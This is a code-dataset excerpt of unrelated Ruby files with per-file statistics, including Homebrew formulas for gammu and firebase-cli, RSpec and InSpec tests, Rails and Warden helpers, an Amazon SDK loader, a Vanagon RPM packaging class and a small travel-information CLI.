url "https://dl.cihar.com/gammu/releases/gammu-1.37.4.tar.xz"
mirror "https://mirrors.kernel.org/debian/pool/main/g/gammu/gammu_1.37.4.orig.tar.xz"
sha256 "ee345d9e1a06fd055bca8a4b418778a9568178a2c34082e820f86851c535f869"
head "https://github.com/gammu/gammu.git"
bottle do
sha256 "b120f66edf3aa96dd6b934e164753b26dbaaf54bab93cd4996c5604fbbf661e5" => :el_capitan
sha256 "998c00a999450a91711b99534015b6f4ff4f8e48f479420370782b576982e52f" => :yosemite
sha256 "7818e0e49b9a6546a68a12df16fd165e902d5ddf12b41f3a8ee75580da484198" => :mavericks
end
depends_on "cmake" => :build
depends_on "glib" => :recommended
depends_on "openssl"
def install
mkdir "build" do
system "cmake", "..", "-DBASH_COMPLETION_COMPLETIONSDIR:PATH=#{bash_completion}", *std_cmake_args
system "make", "install"
end
end
test do
system bin/"gammu", "--help"
end
end
| 33.5 | 103 | 0.747264 |
7acfb4b98fc61a70a9e0c45417c4d8930f629f72 | 463 | # # encoding: utf-8
# Inspec test for recipe own_cookbook::default
# The Inspec reference, with examples and extensive documentation, can be
# found at http://inspec.io/docs/reference/resources/
unless os.windows?
describe user('root') do
it { should exist }
skip 'This is an example test, replace with your own test.'
end
end
describe port(80) do
it { should_not be_listening }
skip 'This is an example test, replace with your own test.'
end
| 24.368421 | 73 | 0.725702 |
ac921f8687ff6c30ac4b92dba8b053e641e7b113 | 2,421 | # encoding: utf-8
require 'spec_helper'
describe Relation, '#eql?' do
subject { object.eql?(other) }
let(:header) { [[:id, Integer]] }
let(:body) { LazyEnumerable.new([[1]]) }
let(:object) { described_class.new(header, body) }
before do
expect(object).to be_instance_of(described_class)
end
context 'with the same object' do
let(:other) { object }
it { should be(true) }
it 'is symmetric' do
should eql(other.eql?(object))
end
end
context 'with an equivalent object' do
let(:other) { object.dup }
it { should be(true) }
it 'is symmetric' do
should eql(other.eql?(object))
end
end
context 'with an equivalent object of a subclass' do
let(:other) { Class.new(described_class).new(header, body) }
it { should be(false) }
it 'is symmetric' do
should eql(other.eql?(object))
end
end
context 'with an object having a different header' do
let(:other_header) { [[:id, Numeric]] }
let(:other_body) { body }
let(:other) { described_class.new(other_header, other_body) }
it { should be(false) }
it 'is symmetric' do
should eql(other.eql?(object))
end
end
context 'with an object having a different body' do
let(:other_header) { header }
let(:other_body) { LazyEnumerable.new([[2]]) }
let(:other) { described_class.new(other_header, other_body) }
it { should be(false) }
it 'is symmetric' do
should eql(other.eql?(object))
end
end
context 'with an object having an equivalent header in a different order' do
let(:attribute1) { [:id, Integer] }
let(:attribute2) { [:name, String] }
let(:header1) { [attribute1, attribute2] }
let(:header2) { [attribute2, attribute1] }
let(:object) { described_class.new(header1, LazyEnumerable.new([[1, 'Dan Kubb']])) }
let(:other) { described_class.new(header2, LazyEnumerable.new([['Dan Kubb', 1]])) }
it { should be(true) }
it 'is symmetric' do
should eql(other.eql?(object))
end
end
end
| 28.482353 | 92 | 0.533251 |
b96fbc968afeff793ae51e99df9b4c98bc580ee5 | 530 | class CalendarController < ApplicationController
add_breadcrumb "Calendar"
def index
@issues_json = Issue.where(issue_status: :open).to_json(methods: [:start_date, :end_date, :text, :url, :color])
@todos_json = current_user.todos.to_json(methods: [:text, :url, :color, :start_date, :end_date])
@weeks_json = Week.joins(:grow).where.not('grows.grow_status': [:done, :aborted]).to_json(methods: [:text, :url, :color])
@observations_json = Observation.all.to_json(methods: [:start_date, :end_date, :text, :url])
end
end | 53 | 123 | 0.728302 |
1ae47a5a0eedbd56a8039de6c096f061562e3b36 | 6,427 | =begin
#Selling Partner API for A+ Content Management
#With the A+ Content API, you can build applications that help selling partners add rich marketing content to their Amazon product detail pages. A+ content helps selling partners share their brand and product story, which helps buyers make informed purchasing decisions. Selling partners assemble content by choosing from content modules and adding images and text.
OpenAPI spec version: 2020-11-01
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.26
=end
# Common files
require 'aplus-content-api-model/api_client'
require 'aplus-content-api-model/api_error'
require 'aplus-content-api-model/version'
require 'aplus-content-api-model/configuration'
# Models
require 'aplus-content-api-model/models/aplus_paginated_response'
require 'aplus-content-api-model/models/aplus_response'
require 'aplus-content-api-model/models/asin'
require 'aplus-content-api-model/models/asin_badge'
require 'aplus-content-api-model/models/asin_badge_set'
require 'aplus-content-api-model/models/asin_metadata'
require 'aplus-content-api-model/models/asin_metadata_set'
require 'aplus-content-api-model/models/asin_set'
require 'aplus-content-api-model/models/color_type'
require 'aplus-content-api-model/models/content_badge'
require 'aplus-content-api-model/models/content_badge_set'
require 'aplus-content-api-model/models/content_document'
require 'aplus-content-api-model/models/content_metadata'
require 'aplus-content-api-model/models/content_metadata_record'
require 'aplus-content-api-model/models/content_metadata_record_list'
require 'aplus-content-api-model/models/content_module'
require 'aplus-content-api-model/models/content_module_list'
require 'aplus-content-api-model/models/content_module_type'
require 'aplus-content-api-model/models/content_record'
require 'aplus-content-api-model/models/content_reference_key'
require 'aplus-content-api-model/models/content_reference_key_set'
require 'aplus-content-api-model/models/content_status'
require 'aplus-content-api-model/models/content_sub_type'
require 'aplus-content-api-model/models/content_type'
require 'aplus-content-api-model/models/decorator'
require 'aplus-content-api-model/models/decorator_set'
require 'aplus-content-api-model/models/decorator_type'
require 'aplus-content-api-model/models/error'
require 'aplus-content-api-model/models/error_list'
require 'aplus-content-api-model/models/get_content_document_response'
require 'aplus-content-api-model/models/image_component'
require 'aplus-content-api-model/models/image_crop_specification'
require 'aplus-content-api-model/models/image_dimensions'
require 'aplus-content-api-model/models/image_offsets'
require 'aplus-content-api-model/models/integer_with_units'
require 'aplus-content-api-model/models/language_tag'
require 'aplus-content-api-model/models/list_content_document_asin_relations_response'
require 'aplus-content-api-model/models/marketplace_id'
require 'aplus-content-api-model/models/message_set'
require 'aplus-content-api-model/models/page_token'
require 'aplus-content-api-model/models/paragraph_component'
require 'aplus-content-api-model/models/plain_text_item'
require 'aplus-content-api-model/models/position_type'
require 'aplus-content-api-model/models/post_content_document_approval_submission_response'
require 'aplus-content-api-model/models/post_content_document_asin_relations_request'
require 'aplus-content-api-model/models/post_content_document_asin_relations_response'
require 'aplus-content-api-model/models/post_content_document_request'
require 'aplus-content-api-model/models/post_content_document_response'
require 'aplus-content-api-model/models/post_content_document_suspend_submission_response'
require 'aplus-content-api-model/models/publish_record'
require 'aplus-content-api-model/models/publish_record_list'
require 'aplus-content-api-model/models/search_content_documents_response'
require 'aplus-content-api-model/models/search_content_publish_records_response'
require 'aplus-content-api-model/models/standard_company_logo_module'
require 'aplus-content-api-model/models/standard_comparison_product_block'
require 'aplus-content-api-model/models/standard_comparison_table_module'
require 'aplus-content-api-model/models/standard_four_image_text_module'
require 'aplus-content-api-model/models/standard_four_image_text_quadrant_module'
require 'aplus-content-api-model/models/standard_header_image_text_module'
require 'aplus-content-api-model/models/standard_header_text_list_block'
require 'aplus-content-api-model/models/standard_image_caption_block'
require 'aplus-content-api-model/models/standard_image_sidebar_module'
require 'aplus-content-api-model/models/standard_image_text_block'
require 'aplus-content-api-model/models/standard_image_text_caption_block'
require 'aplus-content-api-model/models/standard_image_text_overlay_module'
require 'aplus-content-api-model/models/standard_multiple_image_text_module'
require 'aplus-content-api-model/models/standard_product_description_module'
require 'aplus-content-api-model/models/standard_single_image_highlights_module'
require 'aplus-content-api-model/models/standard_single_image_specs_detail_module'
require 'aplus-content-api-model/models/standard_single_side_image_module'
require 'aplus-content-api-model/models/standard_tech_specs_module'
require 'aplus-content-api-model/models/standard_text_block'
require 'aplus-content-api-model/models/standard_text_list_block'
require 'aplus-content-api-model/models/standard_text_module'
require 'aplus-content-api-model/models/standard_text_pair_block'
require 'aplus-content-api-model/models/standard_three_image_text_module'
require 'aplus-content-api-model/models/text_component'
require 'aplus-content-api-model/models/text_item'
require 'aplus-content-api-model/models/validate_content_document_asin_relations_response'
# APIs
require 'aplus-content-api-model/api/aplus_content_api'
module AmzSpApi::AplusContentApiModel
class << self
# Customize default settings for the SDK using block.
# AmzSpApi::AplusContentApiModel.configure do |config|
# config.username = "xxx"
# config.password = "xxx"
# end
# If no block given, return the default Configuration object.
def configure
if block_given?
yield(Configuration.default)
else
Configuration.default
end
end
end
end
| 53.558333 | 365 | 0.838961 |
28e29fda0bd1fc18386dc3a0dc3a640e0a18035f | 594 | #!/usr/bin/env ruby
# Makes sure log, log_e, and bench can be overridden.
# (C)2013 Mike Bourgeous
require_relative '../lib/nlhue'
NLHue::Log.on_log do |*args|
puts "OK: Log overridden #{args}"
end
NLHue::Log.on_log_e do |*args|
puts "OK: Log_e overridden #{args}"
end
NLHue::Log.on_bench do |*args, &block|
puts "Benchmark overridden #{args}"
block.call(true)
end
NLHue.log "successfully (not if at start of line)"
NLHue.log_e StandardError.new('an error'), 'indeed (not if at start of line)'
NLHue.bench 'test bench' do |*args|
raise 'Not overridden' unless args[0] == true
end
| 23.76 | 77 | 0.70202 |
1c0fc282491ef1351e45f4b8053545b85b53b4ce | 469 | class ManageAssignments::CoursesController < ApplicationController
def show
@course = CourseCoverage.new(course)
authorize(@course)
if @course.has_coverages?
render :show
else
render :show_without_coverages
end
end
def course
policy_scope(Course).
includes(outcomes: :outcome_coverages).
includes(coverages: :subject).
includes(outcome_coverages: [:assignment, :outcome]).
find(params[:id])
end
end
| 22.333333 | 66 | 0.690832 |
618937d9f9a5fa8677e7827bed42713fc912875a | 2,052 | require "language/node"
class FirebaseCli < Formula
desc "Firebase command-line tools"
homepage "https://firebase.google.com/docs/cli/"
url "https://registry.npmjs.org/firebase-tools/-/firebase-tools-10.0.1.tgz"
sha256 "cfa57ac33a7b81e923ab3712fa5e0c10cc4c514294a4d1aa77442bfca5525df3"
license "MIT"
head "https://github.com/firebase/firebase-tools.git", branch: "master"
bottle do
sha256 cellar: :any_skip_relocation, arm64_monterey: "afaf0369360eb7c072a3ef5c0acdc232fd8ab6e4a3c0a63b7fbcc4797119dc76"
sha256 cellar: :any_skip_relocation, arm64_big_sur: "afaf0369360eb7c072a3ef5c0acdc232fd8ab6e4a3c0a63b7fbcc4797119dc76"
sha256 cellar: :any_skip_relocation, monterey: "2f0660812e3575809a192223c0f1ccd8e9c7044f7ce3a97fa261a62c68ee3b44"
sha256 cellar: :any_skip_relocation, big_sur: "2f0660812e3575809a192223c0f1ccd8e9c7044f7ce3a97fa261a62c68ee3b44"
sha256 cellar: :any_skip_relocation, catalina: "2f0660812e3575809a192223c0f1ccd8e9c7044f7ce3a97fa261a62c68ee3b44"
sha256 cellar: :any_skip_relocation, x86_64_linux: "e78107619338a31bf513b3256a79da295a92b739b1d473436ec4c647259f75e2"
end
depends_on "node"
uses_from_macos "expect" => :test
on_macos do
depends_on "macos-term-size"
end
def install
system "npm", "install", *Language::Node.std_npm_install_args(libexec)
bin.install_symlink Dir["#{libexec}/bin/*"]
term_size_vendor_dir = libexec/"lib/node_modules/firebase-tools/node_modules/term-size/vendor"
term_size_vendor_dir.rmtree # remove pre-built binaries
if OS.mac?
macos_dir = term_size_vendor_dir/"macos"
macos_dir.mkpath
# Replace the vendored pre-built term-size with one we build ourselves
ln_sf (Formula["macos-term-size"].opt_bin/"term-size").relative_path_from(macos_dir), macos_dir
end
end
test do
(testpath/"test.exp").write <<~EOS
spawn #{bin}/firebase login:ci --no-localhost
expect "Paste"
EOS
assert_match "authorization code", shell_output("expect -f test.exp")
end
end
| 40.235294 | 123 | 0.767057 |
bb932d67649f62a036cdbe7b0508f6af013f3455 | 2,406 | # frozen_string_literal: true
require 'types'
require 'dms/main/entities/person'
require 'dms/main/entities/cause'
require 'dms/main/entities/project'
module Dms
module Main
module Entities
class Donation < Dry::Struct
constructor_type :schema
Donation_Types = Types::Strict::String.enum('one-off', 'monthly', 'yearly')
attribute :id, Types::Strict::Int
attribute :correlation_id, Types::Strict::String
attribute :amount, Types::Strict::Int
attribute :currency, Types::Strict::String
attribute :zakat, Types::Bool
attribute :start_date, Types::Strict::Time
attribute :end_date, Types::Strict::Time
attribute :created_at, Types::Strict::Time
attribute :updated_at, Types::Strict::Time
attribute :donation_type, Donation_Types
class WithDonor < Donation
attribute :donor, Entities::Person
def to_json_api
{
'data' => {
'id' => correlation_id,
'type' => 'donations',
'attributes' => attributes,
'relationships' => relationships
}
}.to_json
end
private
def attributes
{
'amount' => amount,
'currency' => currency,
'zakat' => zakat,
'start_date' => start_date,
'end_date' => end_date,
'donation_type' => donation_type
}
end
def relationships
{
'donor' => {
'links' => {
'self' => "http://example.com/donations/#{correlation_id}/relationships/donor",
'related' => "http://example.com/donations/#{correlation_id}/donor"
},
'data' => { 'type' => 'people', 'id' => donor.id }
}
}
end
end
class WithDonorAndCause < Donation
attribute :donor, Entities::Person
attribute :cause, Types::Strict::Array.member(Entities::Cause)
end
class WithDonorAndProject < Donation
attribute :donor, Entities::Person
attribute :cause, Types::Strict::Array.member(Entities::Cause)
attribute :project, Types::Strict::Array.member(Entities::Project)
end
end
end
end
end
| 30.075 | 97 | 0.5399 |
62503fe20609a4558f4c1d093ff788aa9a2e97bf | 3,429 | require File.expand_path('../../../spec_helper', __FILE__)
require File.expand_path('../fixtures/classes', __FILE__)
require File.expand_path('../shared/enumeratorized', __FILE__)
describe "Enumerable#each_slice" do
before :each do
@enum = EnumerableSpecs::Numerous.new(7,6,5,4,3,2,1)
@sliced = [[7,6,5],[4,3,2],[1]]
end
it "passes element groups to the block" do
acc = []
@enum.each_slice(3){|g| acc << g}.should be_nil
acc.should == @sliced
end
it "raises an ArgumentError if there is not a single parameter > 0" do
lambda{ @enum.each_slice(0){} }.should raise_error(ArgumentError)
lambda{ @enum.each_slice(-2){} }.should raise_error(ArgumentError)
lambda{ @enum.each_slice{} }.should raise_error(ArgumentError)
lambda{ @enum.each_slice(2,2){} }.should raise_error(ArgumentError)
lambda{ @enum.each_slice(0) }.should raise_error(ArgumentError)
lambda{ @enum.each_slice(-2) }.should raise_error(ArgumentError)
lambda{ @enum.each_slice }.should raise_error(ArgumentError)
lambda{ @enum.each_slice(2,2) }.should raise_error(ArgumentError)
end
it "tries to convert n to an Integer using #to_int" do
acc = []
@enum.each_slice(3.3){|g| acc << g}.should == nil
acc.should == @sliced
obj = mock('to_int')
obj.should_receive(:to_int).and_return(3)
@enum.each_slice(obj){|g| break g.length}.should == 3
end
it "works when n is >= full length" do
full = @enum.to_a
acc = []
@enum.each_slice(full.length){|g| acc << g}
acc.should == [full]
acc = []
@enum.each_slice(full.length+1){|g| acc << g}
acc.should == [full]
end
it "yields only as much as needed" do
cnt = EnumerableSpecs::EachCounter.new(1, 2, :stop, "I said stop!", :got_it)
cnt.each_slice(2) {|g| break 42 if g[0] == :stop }.should == 42
cnt.times_yielded.should == 4
end
it "returns an enumerator if no block" do
e = @enum.each_slice(3)
e.should be_an_instance_of(Enumerator)
e.to_a.should == @sliced
end
it "gathers whole arrays as elements when each yields multiple" do
multi = EnumerableSpecs::YieldsMulti.new
multi.each_slice(2).to_a.should == [[[1, 2], [3, 4, 5]], [[6, 7, 8, 9]]]
end
describe "when no block is given" do
it "returns an enumerator" do
e = @enum.each_slice(3)
e.should be_an_instance_of(Enumerator)
e.to_a.should == @sliced
end
describe "Enumerable with size" do
describe "returned Enumerator" do
describe "size" do
it "returns the ceil of Enumerable size divided by the argument value" do
enum = EnumerableSpecs::NumerousWithSize.new(1, 2, 3, 4, 5, 6, 7, 8, 9, 10)
enum.each_slice(10).size.should == 1
enum.each_slice(9).size.should == 2
enum.each_slice(3).size.should == 4
enum.each_slice(2).size.should == 5
enum.each_slice(1).size.should == 10
end
it "returns 0 when the Enumerable is empty" do
enum = EnumerableSpecs::EmptyWithSize.new
enum.each_slice(10).size.should == 0
end
end
end
end
describe "Enumerable with no size" do
before :all do
@object = EnumerableSpecs::Numerous.new(1, 2, 3, 4)
@method = [:each_slice, 8]
end
it_should_behave_like :enumeratorized_with_unknown_size
end
end
end
| 33.617647 | 87 | 0.631671 |
ed6550d84b85356cf5b8403a158f42e7023eef97 | 2,216 | # Based on https://github.com/ajsharp/warden-rspec-rails
module Warden
# Set of helpers for testing with Warden
module Test
# Warden::Test::ControllerHelpers provides a facility to test controllers in isolation
# Most of the code was extracted from Devise's Devise::TestHelpers.
module ControllerHelpers
def self.included(base)
base.class_eval do
before(:each) do
setup_controller_for_warden
end
before(:each) do
warden
end
end
end
# Override process to consider warden.
def process(*)
# Make sure we always return @response, a la ActionController::TestCase::Behavior#process, even if warden interrupts
_catch_warden { super } || @response
end
# We need to setup the environment variables and the response in the controller
def setup_controller_for_warden
@request.env['action_controller.instance'] = @controller
end
# Quick access to Warden::Proxy.
def warden
@warden ||= begin
manager = Warden::Manager.new(nil, &Rails.application.config.middleware.detect{|m| m.name == 'Warden::Manager'}.block)
@request.env['warden'] = Warden::Proxy.new(@request.env, manager)
end
end
protected
# Catch warden continuations and handle like the middleware would.
# Returns nil when interrupted, otherwise the normal result of the block.
def _catch_warden(&block)
result = catch(:warden, &block)
if result.is_a?(Hash) && !warden.custom_failure? && [email protected](:performed?)
result[:action] ||= :unauthenticated
env = @controller.request.env
env['PATH_INFO'] = "/#{result[:action]}"
env['warden.options'] = result
Warden::Manager._run_callbacks(:before_failure, env, result)
status, headers, body = warden.config[:failure_app].call(env).to_a
@controller.send :render, status: status, text: body,
content_type: headers['Content-Type'], location: headers['Location']
nil
else
result
end
end
end
end
end
| 33.575758 | 128 | 0.625 |
613d9aa0365ae11048dddb78161e61aebf0e9362 | 443 | cask :v1 => 'preference-manager' do
version :latest
sha256 :no_check
url 'http://download.digitalrebellion.com/Pref_Man.dmg'
appcast 'http://www.digitalrebellion.com/rss/appcasts/pref_man_appcast.xml'
name 'Preference Manager'
homepage 'http://www.digitalrebellion.com/prefman'
license :unknown # todo: change license and remove this comment; ':unknown' is a machine-generated placeholder
app 'Preference Manager.app'
end
| 34.076923 | 115 | 0.758465 |
386168c6d5291ed4fd370c50ab846b93c0fb7d12 | 1,197 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'duck_puncher/version'
Gem::Specification.new do |spec|
spec.name = "duck_puncher"
spec.version = DuckPuncher::VERSION
spec.authors = ["Ryan Buckley"]
spec.email = ["[email protected]"]
spec.description = %q{Administer precision punches}
spec.summary = %q{Administer precision extensions (a.k.a "punches") to your favorite Ruby classes}
spec.homepage = "https://github.com/ridiculous/duck_puncher"
spec.license = "MIT"
spec.files = `git ls-files`.split($/).keep_if { |f| f =~ /duck_puncher/ and f !~ %r{test/} }
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test)/})
spec.require_paths = ["lib"]
spec.required_ruby_version = ">= 2.0.0"
spec.add_runtime_dependency "usable", ">= 3.3"
spec.add_development_dependency "bundler", ">= 1.3"
spec.add_development_dependency "rake", '~> 10.1'
spec.add_development_dependency "minitest", '~> 5.0'
spec.add_development_dependency "minitest-reporters", '~> 1.1'
end
| 39.9 | 106 | 0.663325 |
61876a254eda6b059bf87684eefbde80c741850b | 766 | require "rails"
require "action_cable"
require "cable_ready"
require "futurism/engine"
require "futurism/message_verifier"
require "futurism/resolver/resources"
require "futurism/resolver/controller"
require "futurism/resolver/controller/renderer"
require "futurism/channel"
require "futurism/helpers"
module Futurism
extend ActiveSupport::Autoload
autoload :Helpers, "futurism/helpers"
mattr_accessor :skip_in_test, default: false
mattr_writer :default_controller
def self.default_controller
(@@default_controller || "::ApplicationController").to_s.constantize
end
ActiveSupport.on_load(:action_view) do
include Futurism::Helpers
end
mattr_accessor :logger
self.logger ||= Rails.logger ? Rails.logger.new : Logger.new($stdout)
end
| 24.709677 | 72 | 0.787206 |
7994e8a573b243ce1e384c772ac1d01e74aab997 | 260 | require 'virtus'
require 'adamantium'
require "podcast_reader/version"
module PodcastReader
# Your code goes here...
end
require 'podcast_reader/podcast'
require 'podcast_reader/item_node'
require 'podcast_reader/request'
require 'podcast_reader/channel'
| 18.571429 | 34 | 0.807692 |
e9c8a307fff230ec925d3fb709606d26735a41b3 | 393 | class GroceryPolicy < ApplicationPolicy
def index?
user.present?
end
def show?
user.present?
end
def create?
user.present?
end
def edit?
user.present?
end
def update?
return true if user.present? && user == item.user
end
def destroy?
return true if user.present? && user == item.user
end
private
def item
record
end
end
| 12.28125 | 53 | 0.618321 |
f782108d13b3a2e75f01652627130a3ff3d12a71 | 4,908 | class Vanagon
class Platform
class RPM < Vanagon::Platform
# The specific bits used to generate an rpm package for a given project
#
# @param project [Vanagon::Project] project to build an rpm package of
# @return [Array] list of commands required to build an rpm package for the given project from a tarball
def generate_package(project) # rubocop:disable Metrics/AbcSize
target_dir = project.repo ? output_dir(project.repo) : output_dir
target_source_output_dir = project.repo ? source_output_dir(project.repo) : source_output_dir
if project.source_artifacts
rpmbuild = "#{@rpmbuild} -ba"
artifact_copy = "mkdir -p output/#{target_source_output_dir}; cp $(tempdir)/rpmbuild/RPMS/**/*.rpm ./output/#{target_dir}; cp $(tempdir)/rpmbuild/SRPMS/*.rpm ./output/#{target_source_output_dir}"
else
rpmbuild = "#{@rpmbuild} -bb"
artifact_copy = "cp $(tempdir)/rpmbuild/*RPMS/**/*.rpm ./output/#{target_dir}"
end
["bash -c 'mkdir -p $(tempdir)/rpmbuild/{SOURCES,SPECS,BUILD,RPMS,SRPMS}'",
"cp #{project.name}-#{project.version}.tar.gz $(tempdir)/rpmbuild/SOURCES",
"cp file-list-for-rpm $(tempdir)/rpmbuild/SOURCES",
"cp #{project.name}.spec $(tempdir)/rpmbuild/SPECS",
"PATH=/opt/freeware/bin:$$PATH #{rpmbuild} --target #{@architecture} #{rpm_defines} $(tempdir)/rpmbuild/SPECS/#{project.name}.spec",
"mkdir -p output/#{target_dir}",
artifact_copy]
end
# Method to generate the files required to build an rpm package for the project
#
# @param workdir [String] working directory to stage the evaluated templates in
# @param name [String] name of the project
# @param binding [Binding] binding to use in evaluating the packaging templates
# @param project [Vanagon::Project] Vanagon::Project we are building for
def generate_packaging_artifacts(workdir, name, binding, project)
erb_file(File.join(VANAGON_ROOT, "resources/rpm/project.spec.erb"), File.join(workdir, "#{name}.spec"), false, { :binding => binding })
end
# Method to derive the package name for the project
#
# @param project [Vanagon::Project] project to name
# @return [String] name of the rpm package for this project
def package_name(project)
"#{project.name}-#{project.version}-#{project.release}.#{project.noarch ? 'noarch' : @architecture}.rpm"
end
def output_dir(target_repo = "products")
super
end
# Method to derive the directory for source artifacts
#
# @param target_repo [String] repo the source artifacts are targeting
def source_output_dir(target_repo = "products")
@source_output_dir ||= File.join(@os_name, @os_version, target_repo, 'SRPMS')
end
def rpm_defines
defines = %(--define '_topdir $(tempdir)/rpmbuild' )
# RPM doesn't allow dashes in the os_name. This was added to
# convert cisco-wrlinux to cisco_wrlinux
defines << %(--define 'dist .#{dist}')
end
def add_repository(definition) # rubocop:disable Metrics/AbcSize
definition = URI.parse(definition)
commands = ["rpm -q curl > /dev/null || yum -y install curl"]
if definition.scheme =~ /^(http|ftp)/
if File.extname(definition.path) == '.rpm'
# repo definition is an rpm (like puppetlabs-release)
commands << "curl -o local.rpm '#{definition}'; rpm -Uvh local.rpm; rm -f local.rpm"
else
reponame = "#{SecureRandom.hex}-#{File.basename(definition.path)}"
reponame = "#{reponame}.repo" if File.extname(reponame) != '.repo'
if is_cisco_wrlinux?
commands << "curl -o '/etc/yum/repos.d/#{reponame}' '#{definition}'"
else
commands << "curl -o '/etc/yum.repos.d/#{reponame}' '#{definition}'"
end
end
end
commands
end
# Pass in a packaging override. This will get added to the spec file, and
# is a good way to pass in arbitrary `%_define` or `%_global`
#
# @param project
# @param var the string that should be added to the build script.
def package_override(project, var)
project.package_overrides << var
end
# Constructor. Sets up some defaults for the rpm platform and calls the parent constructor
#
# @param name [String] name of the platform
# @return [Vanagon::Platform::RPM] the rpm derived platform with the given name
def initialize(name)
@name = name
@make ||= "/usr/bin/make"
@tar ||= "tar"
@patch ||= "/usr/bin/patch"
@num_cores ||= "/bin/grep -c 'processor' /proc/cpuinfo"
@rpmbuild ||= "/usr/bin/rpmbuild"
super(name)
end
end
end
end
| 44.216216 | 205 | 0.628158 |
280518d9110688bebc90eb9a319d0402507952d1 | 1,958 | require 'pry'
class CLI
attr_accessor :user
def greeting
puts "Welcome To Your Journy!"
puts "***********************"
puts " Please enter your fullname"
@user = gets.chomp.strip.upcase
puts " "
puts "Welcome #{@user}: If you are intrested in traveling the world enter 'travel'"
puts " "
puts "If you are not intrsted in traveling enter 'exit'"
API.fetch_api
info
end
def info
input = gets.strip.downcase
if input == "travel"
travel_list
info
elsif input == "exit"
log_out
else
invalid_entry
end
end
def travel_list
Travel.all.each_with_index do |travel, index|
puts "#{index + 1}. #{travel.name}"
end
puts " "
puts "Please choose the countrie you would like to get information about "
puts "...Where would you like to travel to:"
puts " "
input = gets.strip.downcase
travel_selection(input)
end
def travel_selection(travel)
countrie = Travel.find_by_name(travel)
countrie.update
#puts "Url: #{countrie.url}"
#puts "advise: #{countrie.advise}"
#puts "Health: #{countrie.health}"
puts "Weather: #{countrie.weather}"
puts "Language: #{countrie.language}"
puts "Currency: #{countrie.currency}"
puts "Vaccines: #{countrie.vaccines}"
# puts "Visa_requirements: #{countrie.visa_requirements}"
#puts "Electric_sockets: #{countrie.electric_sockets}"
end
def invalid_entry
puts "Invalid Entry"
puts "If u would like to continue please enter the correct information"
info
end
def log_out
puts " "
puts "You are know logged out"
puts "Thank you for using thise application"
puts " "
puts "Goodbye"
end
end | 27.577465 | 91 | 0.565373 |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.